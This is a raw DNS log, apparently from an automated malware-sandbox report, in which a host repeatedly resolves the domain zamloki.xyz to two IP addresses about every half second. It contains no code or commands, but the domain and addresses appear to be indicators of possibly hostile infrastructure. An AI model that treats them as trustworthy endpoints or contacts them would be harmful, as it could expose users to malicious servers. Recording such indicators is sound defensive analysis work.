                                    Jul 21, 2021 17:02:07.421330929 CEST8.8.8.8192.168.2.30x4ff3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:07.421330929 CEST8.8.8.8192.168.2.30x4ff3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:07.966809034 CEST8.8.8.8192.168.2.30x9976No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:07.966809034 CEST8.8.8.8192.168.2.30x9976No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:08.585386038 CEST8.8.8.8192.168.2.30x7b3fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:08.585386038 CEST8.8.8.8192.168.2.30x7b3fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.154872894 CEST8.8.8.8192.168.2.30xc9c4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.154872894 CEST8.8.8.8192.168.2.30xc9c4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.658538103 CEST8.8.8.8192.168.2.30x21ddNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:09.658538103 CEST8.8.8.8192.168.2.30x21ddNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.222089052 CEST8.8.8.8192.168.2.30x5af5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.222089052 CEST8.8.8.8192.168.2.30x5af5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.794037104 CEST8.8.8.8192.168.2.30x9558No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:10.794037104 CEST8.8.8.8192.168.2.30x9558No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.321959019 CEST8.8.8.8192.168.2.30x8e6fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.321959019 CEST8.8.8.8192.168.2.30x8e6fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.897567987 CEST8.8.8.8192.168.2.30x1031No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:11.897567987 CEST8.8.8.8192.168.2.30x1031No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:12.453144073 CEST8.8.8.8192.168.2.30x4a9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:12.453144073 CEST8.8.8.8192.168.2.30x4a9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.139075994 CEST8.8.8.8192.168.2.30xf6eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.139075994 CEST8.8.8.8192.168.2.30xf6eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.691154003 CEST8.8.8.8192.168.2.30xcd59No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:13.691154003 CEST8.8.8.8192.168.2.30xcd59No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.209321976 CEST8.8.8.8192.168.2.30xfcf8No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.209321976 CEST8.8.8.8192.168.2.30xfcf8No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.803193092 CEST8.8.8.8192.168.2.30x5813No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:14.803193092 CEST8.8.8.8192.168.2.30x5813No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.314749956 CEST8.8.8.8192.168.2.30x92a2No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.314749956 CEST8.8.8.8192.168.2.30x92a2No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.864459991 CEST8.8.8.8192.168.2.30xa8eaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:15.864459991 CEST8.8.8.8192.168.2.30xa8eaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.378748894 CEST8.8.8.8192.168.2.30x662dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.378748894 CEST8.8.8.8192.168.2.30x662dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.943586111 CEST8.8.8.8192.168.2.30xf8caNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:16.943586111 CEST8.8.8.8192.168.2.30xf8caNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:17.558372974 CEST8.8.8.8192.168.2.30x8796No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:17.558372974 CEST8.8.8.8192.168.2.30x8796No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.089778900 CEST8.8.8.8192.168.2.30xe059No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.089778900 CEST8.8.8.8192.168.2.30xe059No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.669893980 CEST8.8.8.8192.168.2.30x8de0No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:18.669893980 CEST8.8.8.8192.168.2.30x8de0No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.184742928 CEST8.8.8.8192.168.2.30xbc62No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.184742928 CEST8.8.8.8192.168.2.30xbc62No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.696664095 CEST8.8.8.8192.168.2.30x84c1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:19.696664095 CEST8.8.8.8192.168.2.30x84c1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:20.844033957 CEST8.8.8.8192.168.2.30x313aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:20.844033957 CEST8.8.8.8192.168.2.30x313aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:21.668024063 CEST8.8.8.8192.168.2.30xa41aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:21.668024063 CEST8.8.8.8192.168.2.30xa41aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.302670956 CEST8.8.8.8192.168.2.30x99e1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.302670956 CEST8.8.8.8192.168.2.30x99e1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.845704079 CEST8.8.8.8192.168.2.30x4648No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:22.845704079 CEST8.8.8.8192.168.2.30x4648No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.384310961 CEST8.8.8.8192.168.2.30xabafNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.384310961 CEST8.8.8.8192.168.2.30xabafNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.899239063 CEST8.8.8.8192.168.2.30x49deNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:23.899239063 CEST8.8.8.8192.168.2.30x49deNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:24.530240059 CEST8.8.8.8192.168.2.30x8995No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:24.530240059 CEST8.8.8.8192.168.2.30x8995No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.063020945 CEST8.8.8.8192.168.2.30x67d4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.063020945 CEST8.8.8.8192.168.2.30x67d4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.549998999 CEST8.8.8.8192.168.2.30xcc31No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:25.549998999 CEST8.8.8.8192.168.2.30xcc31No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.041862965 CEST8.8.8.8192.168.2.30xeedcNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.041862965 CEST8.8.8.8192.168.2.30xeedcNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.624532938 CEST8.8.8.8192.168.2.30x7cb9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:26.624532938 CEST8.8.8.8192.168.2.30x7cb9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.118690968 CEST8.8.8.8192.168.2.30xa59dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.118690968 CEST8.8.8.8192.168.2.30xa59dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.597445965 CEST8.8.8.8192.168.2.30x5ad6No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:27.597445965 CEST8.8.8.8192.168.2.30x5ad6No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.111366034 CEST8.8.8.8192.168.2.30x6204No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.111366034 CEST8.8.8.8192.168.2.30x6204No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.591471910 CEST8.8.8.8192.168.2.30xdf75No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:28.591471910 CEST8.8.8.8192.168.2.30xdf75No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.097557068 CEST8.8.8.8192.168.2.30x6fa4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.097557068 CEST8.8.8.8192.168.2.30x6fa4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.569693089 CEST8.8.8.8192.168.2.30x31cfNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:29.569693089 CEST8.8.8.8192.168.2.30x31cfNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.195637941 CEST8.8.8.8192.168.2.30x207cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.195637941 CEST8.8.8.8192.168.2.30x207cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.690920115 CEST8.8.8.8192.168.2.30xc771No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:30.690920115 CEST8.8.8.8192.168.2.30xc771No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.329921961 CEST8.8.8.8192.168.2.30xac6aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.329921961 CEST8.8.8.8192.168.2.30xac6aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.916907072 CEST8.8.8.8192.168.2.30x4925No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:31.916907072 CEST8.8.8.8192.168.2.30x4925No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.398425102 CEST8.8.8.8192.168.2.30x4ce6No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.398425102 CEST8.8.8.8192.168.2.30x4ce6No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.859075069 CEST8.8.8.8192.168.2.30x9f9aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:32.859075069 CEST8.8.8.8192.168.2.30x9f9aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.386698961 CEST8.8.8.8192.168.2.30x6c5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.386698961 CEST8.8.8.8192.168.2.30x6c5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.849528074 CEST8.8.8.8192.168.2.30x1c51No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:33.849528074 CEST8.8.8.8192.168.2.30x1c51No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.362941027 CEST8.8.8.8192.168.2.30x5368No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.362941027 CEST8.8.8.8192.168.2.30x5368No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.884322882 CEST8.8.8.8192.168.2.30x53bbNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:34.884322882 CEST8.8.8.8192.168.2.30x53bbNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.431210041 CEST8.8.8.8192.168.2.30x1f89No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.431210041 CEST8.8.8.8192.168.2.30x1f89No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.932272911 CEST8.8.8.8192.168.2.30x8eceNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:35.932272911 CEST8.8.8.8192.168.2.30x8eceNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:36.746150970 CEST8.8.8.8192.168.2.30x1ef3No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:36.746150970 CEST8.8.8.8192.168.2.30x1ef3No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.240616083 CEST8.8.8.8192.168.2.30x2939No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.240616083 CEST8.8.8.8192.168.2.30x2939No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.845212936 CEST8.8.8.8192.168.2.30xad79No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:37.845212936 CEST8.8.8.8192.168.2.30xad79No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.331445932 CEST8.8.8.8192.168.2.30xd558No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.331445932 CEST8.8.8.8192.168.2.30xd558No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.821816921 CEST8.8.8.8192.168.2.30x6232No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:38.821816921 CEST8.8.8.8192.168.2.30x6232No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.433140993 CEST8.8.8.8192.168.2.30x5daaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.433140993 CEST8.8.8.8192.168.2.30x5daaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.939459085 CEST8.8.8.8192.168.2.30x4c88No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:39.939459085 CEST8.8.8.8192.168.2.30x4c88No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.411689997 CEST8.8.8.8192.168.2.30xa869No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.411689997 CEST8.8.8.8192.168.2.30xa869No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.937676907 CEST8.8.8.8192.168.2.30x1f83No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:40.937676907 CEST8.8.8.8192.168.2.30x1f83No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:41.528363943 CEST8.8.8.8192.168.2.30x2fb7No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:41.528363943 CEST8.8.8.8192.168.2.30x2fb7No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.016674042 CEST8.8.8.8192.168.2.30x7f63No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.016674042 CEST8.8.8.8192.168.2.30x7f63No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.508809090 CEST8.8.8.8192.168.2.30xa7b7No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:42.508809090 CEST8.8.8.8192.168.2.30xa7b7No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:43.005970955 CEST8.8.8.8192.168.2.30xb5e5No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:43.005970955 CEST8.8.8.8192.168.2.30xb5e5No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:43.516379118 CEST8.8.8.8192.168.2.30x948aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:43.516379118 CEST8.8.8.8192.168.2.30x948aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.257256031 CEST8.8.8.8192.168.2.30x65c1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.257256031 CEST8.8.8.8192.168.2.30x65c1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.887240887 CEST8.8.8.8192.168.2.30x61abNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:44.887240887 CEST8.8.8.8192.168.2.30x61abNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:45.844196081 CEST8.8.8.8192.168.2.30xabeaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:45.844196081 CEST8.8.8.8192.168.2.30xabeaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:47.487322092 CEST8.8.8.8192.168.2.30x3c67No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:47.487322092 CEST8.8.8.8192.168.2.30x3c67No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.029633999 CEST8.8.8.8192.168.2.30xea46No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.029633999 CEST8.8.8.8192.168.2.30xea46No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.586707115 CEST8.8.8.8192.168.2.30x99efNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:48.586707115 CEST8.8.8.8192.168.2.30x99efNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.177376032 CEST8.8.8.8192.168.2.30xe5efNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.177376032 CEST8.8.8.8192.168.2.30xe5efNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.780042887 CEST8.8.8.8192.168.2.30x795aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:49.780042887 CEST8.8.8.8192.168.2.30x795aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:50.466878891 CEST8.8.8.8192.168.2.30x5561No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:50.466878891 CEST8.8.8.8192.168.2.30x5561No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.118927002 CEST8.8.8.8192.168.2.30x3981No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.118927002 CEST8.8.8.8192.168.2.30x3981No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.593761921 CEST8.8.8.8192.168.2.30x5ffdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:51.593761921 CEST8.8.8.8192.168.2.30x5ffdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.197248936 CEST8.8.8.8192.168.2.30x7828No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.197248936 CEST8.8.8.8192.168.2.30x7828No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.984622955 CEST8.8.8.8192.168.2.30x32eaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:52.984622955 CEST8.8.8.8192.168.2.30x32eaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:53.471581936 CEST8.8.8.8192.168.2.30x8182No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:53.471581936 CEST8.8.8.8192.168.2.30x8182No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.031950951 CEST8.8.8.8192.168.2.30x68c9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.031950951 CEST8.8.8.8192.168.2.30x68c9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.561252117 CEST8.8.8.8192.168.2.30x6d71No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:54.561252117 CEST8.8.8.8192.168.2.30x6d71No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.061321020 CEST8.8.8.8192.168.2.30x20fdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.061321020 CEST8.8.8.8192.168.2.30x20fdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.610295057 CEST8.8.8.8192.168.2.30xef86No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:55.610295057 CEST8.8.8.8192.168.2.30xef86No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.148770094 CEST8.8.8.8192.168.2.30xa089No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.148770094 CEST8.8.8.8192.168.2.30xa089No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.662772894 CEST8.8.8.8192.168.2.30xef9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:56.662772894 CEST8.8.8.8192.168.2.30xef9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.174108982 CEST8.8.8.8192.168.2.30xc904No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.174108982 CEST8.8.8.8192.168.2.30xc904No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.670877934 CEST8.8.8.8192.168.2.30x2c5eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:57.670877934 CEST8.8.8.8192.168.2.30x2c5eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.167531013 CEST8.8.8.8192.168.2.30x769No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.167531013 CEST8.8.8.8192.168.2.30x769No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.735698938 CEST8.8.8.8192.168.2.30x5a80No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:58.735698938 CEST8.8.8.8192.168.2.30x5a80No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.277935982 CEST8.8.8.8192.168.2.30x95ddNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.277935982 CEST8.8.8.8192.168.2.30x95ddNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.860639095 CEST8.8.8.8192.168.2.30x5681No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:02:59.860639095 CEST8.8.8.8192.168.2.30x5681No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.452721119 CEST8.8.8.8192.168.2.30x176bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.452721119 CEST8.8.8.8192.168.2.30x176bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.975579023 CEST8.8.8.8192.168.2.30x26daNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:00.975579023 CEST8.8.8.8192.168.2.30x26daNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                    Jul 21, 2021 17:03:01.626866102 CEST8.8.8.8192.168.2.30x7c77No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
